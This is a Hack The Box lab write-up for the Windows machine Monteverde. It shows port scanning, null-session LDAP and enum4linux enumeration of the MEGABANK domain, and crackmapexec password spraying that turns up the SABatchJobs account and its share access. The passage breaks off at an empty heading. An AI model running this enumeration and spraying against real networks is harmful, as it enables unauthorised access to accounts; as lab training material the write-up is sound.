Monteverde

Completed on 14 Jan 2020.

Overview

This Hack The Box machine is built on Windows operating system and revolves around Active Directory, LDAP, and misconfigurations. The surprise of this machine was seeing Azure involved; quite interesting.

Some great resources around this are below:

Resources:

Initial Enumeration: Footprinting and Scanning

First of, we need to identify how to reach the system. In other words, we need to identify what are the services available from this machine.

Let's start by adding this machine's IP address to the hosts file and create an alias:

root@kali:~/Documents/HTB-Labs/Monteverde# echo "10.10.10.172  monteverde.htb" >> /etc/hosts

My go-to tools in this phase, which are typically used by many to start enumerating, are:

masscan: very nice port scanning tool that allows finding open ports quickly. To me this is a tool to narrow down the scope of the enumeration so we can focus on open ports only when using nmap.

Here, I am designating the interface to use when communicating to the HTB machine (-e) which will be the HTB VPN interface, along with -p to designate the port range to target but I will target ALL TCP and UDP Ports, and the transmission rate of packets per second (--rate).

Similar to this, you could also run something like this:

nmap -p- --min-rate=1000 -T4

nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile Port scanning tool which also allows you to use scripts to further target the services found. Just like anything, it can be a useful tool while it can also be damaging if the user is not careful.

What I typically start with when using nmap is:

-sC: to use all default non-intrusive nmap scripts on each service 

-sV: to get the service version information which is definitely important for us

-p: to designate the port we will be targeting 

-vvv: for extended verbosity (as I like as many details as I can get)

MASSCAN

user@kali:~/Documents/HTB-Labs/Monteverde$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.172 --rate=1000 | tee Monteverde_masscan.log

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-11 19:07:09 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 49670/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 49673/tcp on 10.10.10.172
Discovered open port 49702/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 49669/tcp on 10.10.10.172
Discovered open port 49776/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 49667/tcp on 10.10.10.172

Now, we can use the output saved in the log file to store the ports in a variable and make ours lives easier:

user@kali:~/Documents/HTB-Labs/Monteverde$ PORTS=$(cat Monteverde_masscan.log | grep Discovered | cut -d" " -f4 | cut -d"/" -f1 | sort | xargs | tr " " ",")

By doing this, we can simply call this variable when performing our port scan.

NMAP

user@kali:~/Documents/HTB-Labs/Monteverde$ nmap -sC -sV -vvv -p $PORTS monteverde.htb -oX Monteverde_TCP.xml -oN Monteverde_TCP.log
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 22:30 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
Initiating Ping Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [4 ports]
Completed Ping Scan at 22:30, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [13 ports]
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Completed SYN Stealth Scan at 22:30, 0.33s elapsed (13 total ports)
Initiating Service scan at 22:30
Scanning 13 services on monteverde.htb (10.10.10.172)
Completed Service scan at 22:33, 149.13s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.10.172.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 99.94% done; ETC: 22:33 (0:00:00 remaining)
Completed NSE at 22:33, 40.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 95.19% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 97.12% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 98.08% done; ETC: 22:35 (0:00:02 remaining)
NSE Timing: About 99.04% done; ETC: 22:35 (0:00:01 remaining)
Completed NSE at 22:35, 120.82s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2020-01-11 22:30:39 EST for 311s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-12 03:40:13Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5E1A92EB%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m25s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48049/tcp): CLEAN (Timeout)
|   Check 2 (port 2859/tcp): CLEAN (Timeout)
|   Check 3 (port 47166/udp): CLEAN (Timeout)
|   Check 4 (port 50283/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-12T03:42:37
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 311.09 seconds
           Raw packets sent: 17 (724B) | Rcvd: 14 (600B)

As you can see from the open ports found, we have the following which are very important:

-> Kerberos: 88/tcp    Microsoft Windows Kerberos

-> DNS: 53/tcp    

-> MSRPC: 135/tcp  open  Microsoft Windows RPC

-> NetBios: 139/tcp  open  Microsoft Windows netbios-ssn

-> LDAP: 389/tcp   Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)

-> SMB: 445/tcp   

-> LDAPS: 636/tcp 

-> Windows Remote Management (WinRM): 5985/tcp  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Some of these ports are typical of Active Directory environments, but not all can be targeted.

For instance, TCP 445 would reveal more information if some conditions were applicable for the port scan to access it, the fact that no other information was returned means that it shouldn't be our first attempt.

MSRPC and Netbios can return some information, but we won't target them directly. LDAP on the other hand, return domain related information or basically the domain FQDN, which means it could be possible to target through a null session.

Below, I will provide a truncated output as it is too massive to provide, along with the the syntax to use.

LDAPSEARCH

user@kali:~/Documents/HTB-Labs/Monteverde$ ldapsearch -x -h monteverde.htb -b "dc=megabank,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=megabank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
.
.
.
# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 271
# numEntries: 267
# numReferences: 3

To get a more friendly enumeration, let's use enum4linux through a null session using MEGABANK as the Netbios domain name:

ENUM4LINUX

user@kali:~/Documents/HTB-Labs/Monteverde$ enum4linux -w MEGABANK -a monteverde.htb | tee Monteverde_enum4linux.log
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 20:10:58 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... monteverde.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on monteverde.htb    |
 ====================================================== 
[+] Got domain/workgroup name: MEGABANK

 ============================================== 
|    Nbtstat Information for monteverde.htb    |
 ============================================== 
Looking up status of 10.10.10.172
No reply from 10.10.10.172

 ======================================= 
|    Session Check on monteverde.htb    |
 ======================================= 
[+] Server monteverde.htb allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for monteverde.htb    |
 ============================================= 
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 ======================================== 
|    OS information on monteverde.htb    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for monteverde.htb from smbclient: 
[+] Got OS info for monteverde.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================== 
|    Users on monteverde.htb    |
 =============================== 
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2	Name: AAD_987d7f2f57d2	Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos	Name: Dimitris Galanos	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope	Name: Mike Hope	Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary	Name: Ray O'Leary	Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs	Name: SABatchJobs	Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan	Name: Sally Morgan	Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata	Name: svc-ata	Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec	Name: svc-bexec	Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp	Name: svc-netapp	Desc: (null)

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

 =========================================== 
|    Share Enumeration on monteverde.htb    |
 =========================================== 

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on monteverde.htb

 ====================================================== 
|    Password Policy Information for monteverde.htb    |
 ====================================================== 


[+] Attaching to monteverde.htb using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] MEGABANK
	[+] Builtin

[+] Password Info for Domain: MEGABANK

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ================================ 
|    Groups on monteverde.htb    |
 ================================ 

[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+] Getting builtin group memberships:
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

[+] Getting domain group memberships:
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary

 ========================================================================= 
|    Users on monteverde.htb via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 =============================================== 
|    Getting printer info for monteverde.htb    |
 =============================================== 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sun Jan 12 20:18:11 2020

Thanks to enum4linux, we got now a lot of valuable information that is not just related to the users, but critical group membership. Some of these users and groups are related to Azure.

Along with the Azure Directory Sync group and others, we have a MS SQL related group. Let gather a list of users and test for potential user and password combinations.

user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "user:" | cut -d":" -f2 | cut -d"[" -f2 | cut -d"]" -f1
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "has member" | grep "MEGABANK" | grep "Admins" | cut -d":" -f3 | cut -d"\\" -f2
Administrator
AAD_987d7f2f57d2
mhope

Now, we can try using the lazy password approach, including usernames as passwords, and perform password spraying.

CRACKMAPEXEC

user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec -u Monteverde_userList.txt -p passwdLazy.txt --shares monteverde.htb
CME          monteverde.htb:445 MONTEVERDE      [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-ata:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-ata:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-ata:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-bexec:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-bexec:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-bexec:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-netapp:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-netapp:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\svc-netapp:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\dgalanos:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\dgalanos:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\dgalanos:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\roleary:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\roleary:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\roleary:1234567 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\smorgan:changed STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\smorgan:password123 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\smorgan:1234567 STATUS_LOGON_FAILURE 

user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u Monteverde_userList.txt -p Monteverde_userList.txt 
CME          monteverde.htb:445 MONTEVERDE      [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:Guest STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:mhope STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:SABatchJobs STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:svc-ata STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:svc-bexec STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:svc-netapp STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:dgalanos STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:roleary STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\Guest:smorgan STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:Guest STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:mhope STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:SABatchJobs STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:svc-ata STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:svc-bexec STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:svc-netapp STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:dgalanos STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:roleary STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\mhope:smorgan STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:Guest STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [-] MEGABANK\SABatchJobs:mhope STATUS_LOGON_FAILURE 
CME          monteverde.htb:445 MONTEVERDE      [+] MEGABANK\SABatchJobs:SABatchJobs 
[*] KTHXBYE!

Looks like the approach was correct even though the first attempt failed.

As it turns out, the service account SABatchJobs was used as its own password when created; the lazy administrator approach.

Let's try and validate the access this account has:

user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u SABatchJobs -p SABatchJobs --shares
CME          monteverde.htb:445 MONTEVERDE      [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME          monteverde.htb:445 MONTEVERDE      [+] MEGABANK\SABatchJobs:SABatchJobs 
CME          monteverde.htb:445 MONTEVERDE      [+] Enumerating shares
CME          monteverde.htb:445 MONTEVERDE      SHARE           Permissions
CME          monteverde.htb:445 MONTEVERDE      -----           -----------
CME          monteverde.htb:445 MONTEVERDE      users$          READ
CME          monteverde.htb:445 MONTEVERDE      ADMIN$          NO ACCESS
CME          monteverde.htb:445 MONTEVERDE      IPC$            READ
CME          monteverde.htb:445 MONTEVERDE      azure_uploads   READ
CME          monteverde.htb:445 MONTEVERDE      E$              NO ACCESS
CME          monteverde.htb:445 MONTEVERDE      SYSVOL          READ
CME          monteverde.htb:445 MONTEVERDE      C$              NO ACCESS
CME          monteverde.htb:445 MONTEVERDE      NETLOGON        READ
[*] KTHXBYE!

This last attempt basically tell us we can go through each of the shares we have read access with SABatchJobs.

Another way could've been by using smbmap:

user@kali:~/Documents/HTB-Labs/Monteverde$ smbmap -H monteverde.htb -u SABatchJobs -p SABatchJobs -d MEGABANK
[+] IP: monteverde.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	azure_uploads                                     	READ ONLY	
	C$                                                	NO ACCESS	Default share
	E$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
	users$                                            	READ ONLY

Exploitation and Gaining Access

At this point, we can try accessing these shares:

IMPACKET-SMBCLIENT

